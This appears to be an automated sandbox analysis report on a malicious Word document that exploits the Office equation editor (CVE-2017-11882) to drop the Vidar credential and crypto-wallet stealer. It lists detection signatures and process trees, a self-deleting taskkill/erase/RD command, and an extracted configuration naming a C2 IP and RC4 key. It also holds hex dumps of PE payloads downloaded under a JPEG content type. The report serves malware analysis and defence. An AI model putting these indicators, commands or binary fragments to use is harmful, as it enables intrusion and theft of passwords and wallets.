Analysis Report PL_503_13_570.docx

Overview

General Information

Sample Name:PL_503_13_570.docx
Analysis ID:404284
MD5:158e499db47d9c6a56449c86f3b1596f
SHA1:6d0e9274649112ec7e9a757168b7de6eb2c48ff2
SHA256:5e7fe9a4eb6dc098b6ed28b083d277455d66a515e7c78b270ad0515a90279f45

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Vidar stealer
Allocates memory in foreign processes
Creates an undocumented autostart registry key
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Posts data to a JPG file (protocol mismatch)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains no OLE stream with summary information
Document has an unknown application name
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2152 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2620 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • toqqx.exe (PID: 2828 cmdline: C:\Users\user\toqqx.exe MD5: 5753388FBFCDE9E08D00AC9E2BE5D881)
      • toqqx.exe (PID: 2540 cmdline: C:\Users\user\AppData\Local\Temp\toqqx.exe MD5: 5753388FBFCDE9E08D00AC9E2BE5D881)
        • cmd.exe (PID: 3036 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit MD5: AD7B9C14083B52BC532FBA5948342B98)
          • taskkill.exe (PID: 2296 cmdline: taskkill /pid 2540 MD5: 94BDCAFBD584C979B385ADEE14B08AB4)
  • EQNEDT32.EXE (PID: 2944 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • EQNEDT32.EXE (PID: 2480 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • toqqx.exe (PID: 2896 cmdline: C:\Users\user\toqqx.exe MD5: 5753388FBFCDE9E08D00AC9E2BE5D881)
      • toqqx.exe (PID: 2492 cmdline: C:\Users\user\AppData\Local\Temp\toqqx.exe MD5: 5753388FBFCDE9E08D00AC9E2BE5D881)
  • EQNEDT32.EXE (PID: 2276 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • EQNEDT32.EXE (PID: 2228 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: Vidar

{"C2 url": "198.98.60.43", "RC4 Key": "056139954853430408"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: toqqx.exe PID: 2540 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

    Sigma Overview

    Exploits:

    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network Connection | Author: Joe Security | Data: DestinationIp: 31.210.20.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe

    System Summary:

    Sigma detected: Droppers Exploiting CVE-2017-11882
    Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\toqqx.exe, CommandLine: C:\Users\user\toqqx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\toqqx.exe, NewProcessName: C:\Users\user\toqqx.exe, OriginalFileName: C:\Users\user\toqqx.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2620, ProcessCommandLine: C:\Users\user\toqqx.exe, ProcessId: 2828

    Signature Overview

    AV Detection:

    Found malware configuration
    Source: 8.2.toqqx.exe.3526ab8.5.unpack | Malware Configuration Extractor: Vidar {"C2 url": "198.98.60.43", "RC4 Key": "056139954853430408"}
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe | ReversingLabs: Detection: 46%
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | ReversingLabs: Detection: 46%
    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe | ReversingLabs: Detection: 46%
    Source: C:\Users\user\toqqx.exe | ReversingLabs: Detection: 46%
    Multi AV Scanner detection for submitted file
    Source: PL_503_13_570.docx | Virustotal: Detection: 36%
    Source: PL_503_13_570.docx | ReversingLabs: Detection: 34%
    Source: 4.2.toqqx.exe.34fea98.5.unpack | Avira: Label: TR/Patched.Ren.Gen
    Source: 8.2.toqqx.exe.3526ab8.5.unpack | Avira: Label: TR/Patched.Ren.Gen
    Source: 4.2.toqqx.exe.3576ad8.7.unpack | Avira: Label: TR/Patched.Ren.Gen
    Source: 8.2.toqqx.exe.34fea98.6.unpack | Avira: Label: TR/Patched.Ren.Gen
    Source: 8.2.toqqx.exe.3576ad8.7.unpack | Avira: Label: TR/Patched.Ren.Gen
    Source: 4.2.toqqx.exe.3526ab8.6.unpack | Avira: Label: TR/Patched.Ren.Gen
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041CB10 CryptUnprotectData,LocalAlloc,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041CD30 _malloc,_malloc,CryptUnprotectData,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041CB10 CryptUnprotectData,LocalAlloc,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041CD30 _malloc,_malloc,CryptUnprotectData,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,

    Exploits:

    Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\toqqx.exe
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: vcruntime140.i386.pdb source: toqqx.exe, 0000000B.00000003.2251913088.000000000097A000.00000004.00000001.sdmp
    Source: Binary string: vcruntime140.i386.pdbGCTL source: toqqx.exe, 0000000B.00000003.2251913088.000000000097A000.00000004.00000001.sdmp
    Source: Binary string: msvcp140.i386.pdbGCTL source: toqqx.exe, 0000000B.00000003.2242122953.0000000000A7D000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: msvcp140.i386.pdb source: toqqx.exe, 0000000B.00000003.2242122953.0000000000A7D000.00000004.00000001.sdmp
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041F6B0 FindFirstFileExW,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041F6B0 FindFirstFileExW,
    Source: C:\Users\user\toqqx.exe | Code function: 4x nop then jmp 0035DEC5h
    Source: C:\Users\user\toqqx.exe | Code function: 4x nop then jmp 0035DEC5h
    Source: C:\Users\user\toqqx.exe | Code function: 4x nop then jmp 003BDE85h
    Source: C:\Users\user\toqqx.exe | Code function: 4x nop then jmp 003BDE85h
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 4x nop then add esp, 04h
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 4x nop then add esp, 04h
    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 31.210.20.6:80
    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 31.210.20.6:80

    Networking:

    Downloads files with wrong headers with respect to MIME Content-Type
    Source: http | Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:04 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:52 GMT ETag: "235d0-58aa827e4d400" Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg
    Source: http | Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:04 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT ETag: "9d9d8-5562373312d00" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg
    Source: http | Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:06 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT ETag: "519d0-58aa824acda80" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg
    Source: http | Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:07 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT ETag: "217d0-58aa825fc8c00" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg
    Source: http | Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:07 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:30 GMT ETag: "6b738-58aa826952280" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg
    Source: http | Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:08 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:44 GMT ETag: "1303d0-58aa8276ac200" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg
    Source: http | Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:12 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:52 GMT ETag: "235d0-58aa827e4d400" Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg
00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:12 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:02:02 GMT ETag: "14748-58aa8287d6a80" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 
00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:12 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT ETag: "9d9d8-5562373312d00" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 
00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:14 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT ETag: "519d0-58aa824acda80" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 